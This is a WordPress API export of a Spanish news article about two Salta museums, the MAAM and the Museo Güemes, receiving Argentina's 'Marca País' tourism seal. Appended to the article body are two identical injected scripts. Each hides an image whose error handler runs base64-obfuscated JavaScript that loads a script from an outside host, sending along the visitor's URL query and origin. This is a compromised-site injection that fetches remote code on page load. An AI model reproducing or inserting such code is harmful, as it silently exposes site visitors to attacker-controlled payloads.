{"id":2886,"date":"2023-07-21T10:26:41","date_gmt":"2023-07-21T13:26:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2886"},"modified":"2025-08-14T00:12:11","modified_gmt":"2025-08-14T03:12:11","slug":"el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2886","title":{"rendered":"El MAAM y el Museo G\u00fcemes recibir\u00e1n el sello tur\u00edstico Marca Pa\u00eds"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Se entrega a productos e instituciones que, por sus factores diferenciales, contribuyen a la construcci\u00f3n de la identidad. Salta, con estos reconocimientos tendr\u00e1 seis distinciones de este tipo.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n inform\u00f3 que el Museo de Arqueolog\u00eda de Alta Monta\u00f1a (MAAM) y el Museo G\u00fcemes ser\u00e1n reconocidos como Marca Pa\u00eds por su contribuci\u00f3n a la identidad nacional. El proceso para obtener este reconocimiento, inici\u00f3 meses atr\u00e1s por iniciativa del Ministerio de Turismo salte\u00f1o en colaboraci\u00f3n con la Secretar\u00eda de Cultura.<\/p>\n\n\n\n<p>La Marca Pa\u00eds Argentina es una pol\u00edtica de Estado que busca posicionar a nuestro pa\u00eds en el contexto internacional mediante sus factores diferenciales, sus tradiciones, su cultura, entre otros. Es una herramienta de construcci\u00f3n de identidad que incluye al sector productivo y de servicios, talento argentino, cultura, deportes y destinos tur\u00edsticos; mejora la percepci\u00f3n y la imagen del pa\u00eds a nivel internacional resaltando las caracter\u00edsticas positivas y atractivas como destino tur\u00edstico.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"797\" height=\"600\" data-id=\"2887\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais.jpg\" alt=\"\" class=\"wp-image-2887\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais.jpg 797w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-300x226.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-768x578.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-696x524.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-558x420.jpg 558w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90812-el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-265x198.jpg 265w\" sizes=\"(max-width: 797px) 100vw, 797px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"943\" height=\"600\" data-id=\"2889\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo.png\" alt=\"\" class=\"wp-image-2889\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo.png 943w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo-300x191.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo-768x489.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo-696x443.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3942-museo-660x420.png 660w\" sizes=\"(max-width: 943px) 100vw, 943px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"901\" height=\"600\" data-id=\"2888\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo.jpg\" alt=\"\" class=\"wp-image-2888\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo.jpg 901w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3943-museo-631x420.jpg 631w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El sello de turismo \u00abMarca Pa\u00eds\u00bb se utiliza en diversas campa\u00f1as de promoci\u00f3n, materiales de marketing y actividades relacionadas con el turismo para identificar y destacar la oferta tur\u00edstica de Argentina.<\/p>\n\n\n\n<p>En junio, arrib\u00f3 a la provincia un equipo de Naci\u00f3n encabezado por la directora de Marca Pa\u00eds, Nadia Zanardi, con motivo de la entrega de esta distinci\u00f3n al Centro de Convenciones Salta, en este marco, convocaron a postularse a referentes p\u00fablicos y privados que responden a los criterios del programa.&nbsp; En Salta cuenta con Marca Pa\u00eds el restaurante El Baqueano, el Tren a las Nubes, Telef\u00e9rico San Bernardo, Centro de Convenciones y ahora se suman los dos complejos museol\u00f3gicos.<\/p>\n\n\n\n<p>\u201cAgradecemos este reconocimiento como Marca Pa\u00eds para dos de los museos m\u00e1s destacados a nivel nacional, es un orgullo que m\u00e1s instituciones salte\u00f1as se sumen a esta estrategia de promoci\u00f3n tur\u00edstica de Argentina en el mundo\u201d, indic\u00f3 el ministro de Turismo y Deportes Mario Pe\u00f1a, quien invit\u00f3 a referentes culturales, deportistas, gastron\u00f3micos y destinos a postularse. \u201cNuestro destino tiene mucho para ofrecer y este sello acompa\u00f1a el posicionamiento\u201d, sostuvo.<\/p>\n\n\n\n<p>Asimismo, el secretario de Cultura, Diego Ashur, manifest\u00f3 que \u00abel Gobernador constantemente nos llama a potenciar Salta, a trabajar para dejar la provincia en lo m\u00e1s alto. Hoy, dos de los museos m\u00e1s importantes y emblem\u00e1ticos de la provincia se distinguen a nivel pa\u00eds, fortaleciendo el posicionamiento del Norte argentino a nivel nacional e internacional. Este logro invita a los visitantes de las instituciones patrimoniales de la Provincia a conocer nuestra Cultura, a los salte\u00f1os a trav\u00e9s de nuestros espacios que son el reflejo de la historia viva de nuestra tierra\u00bb.<\/p>\n\n\n\n<p><strong>Los Museos<\/strong><\/p>\n\n\n\n<p>El MAAM presenta colecciones referidas al patrimonio arqueol\u00f3gico asociado a las ceremonias realizadas en las altas cumbres de los Andes. Su misi\u00f3n primordial es mantener un espacio para la conservaci\u00f3n, investigaci\u00f3n y difusi\u00f3n de los contextos culturales del mundo prehisp\u00e1nico. Su colecci\u00f3n principal presenta el patrimonio arqueol\u00f3gico descubierto en 1999 en la cima del volc\u00e1n Llullaillaco, donde hace m\u00e1s de 500 a\u00f1os, fueron entregados a los dioses en el contexto de la ceremonia incaica Capacocha, la vida de tres ni\u00f1os y un conjunto de ofrendas simb\u00f3licas.<\/p>\n\n\n\n<p>El excelente estado de conservaci\u00f3n de los ni\u00f1os, hoy conocidos como la Ni\u00f1a del Rayo, el Ni\u00f1o y la Doncella, implic\u00f3 un desaf\u00edo en la aplicaci\u00f3n de t\u00e9cnicas que permiten su adecuada preservaci\u00f3n y presentaci\u00f3n. Los cuerpos de los Ni\u00f1os del Llullaillaco se conservan en c\u00e1psulas dise\u00f1adas seg\u00fan los lineamientos de la criopreservaci\u00f3n.<\/p>\n\n\n\n<p>Pleno de est\u00edmulos visuales y sonoros, el Museo G\u00fcemes propone un recorrido por la historia del General Mart\u00edn Miguel de G\u00fcemes y la gesta emancipadora de un modo did\u00e1ctico \u00fanico e innovador.<\/p>\n\n\n\n<p>Compuesto por diez salas, cada una despliega un recurso esc\u00e9nico y audiovisual distinto, en busca de mantener la atenci\u00f3n de los visitantes de todas las edades. Las t\u00e9cnicas de exhibici\u00f3n incluyen efectos escenogr\u00e1ficos, lum\u00ednicos, programas multimedia y presentaciones audiovisuales in\u00e9ditas para los Museos de Salta y la Regi\u00f3n, que convertir\u00e1n a cada visitante en el protagonista de una experiencia sensorial inolvidable.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-maam-y-el-museo-guemes-recibiran-el-sello-turistico-marca-pais-90812\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se entrega a productos e instituciones que, por sus factores diferenciales, contribuyen a la construcci\u00f3n de la identidad. Salta, con estos reconocimientos tendr\u00e1 seis distinciones de este tipo. El Ministerio de Turismo y Deportes de la Naci\u00f3n inform\u00f3 que el Museo de Arqueolog\u00eda de Alta Monta\u00f1a (MAAM) y el Museo G\u00fcemes ser\u00e1n reconocidos como Marca [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2887,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2886","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2886"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2886"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2886\/revisions"}],"predecessor-version":[{"id":7017,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2886\/revisions\/7017"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2887"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}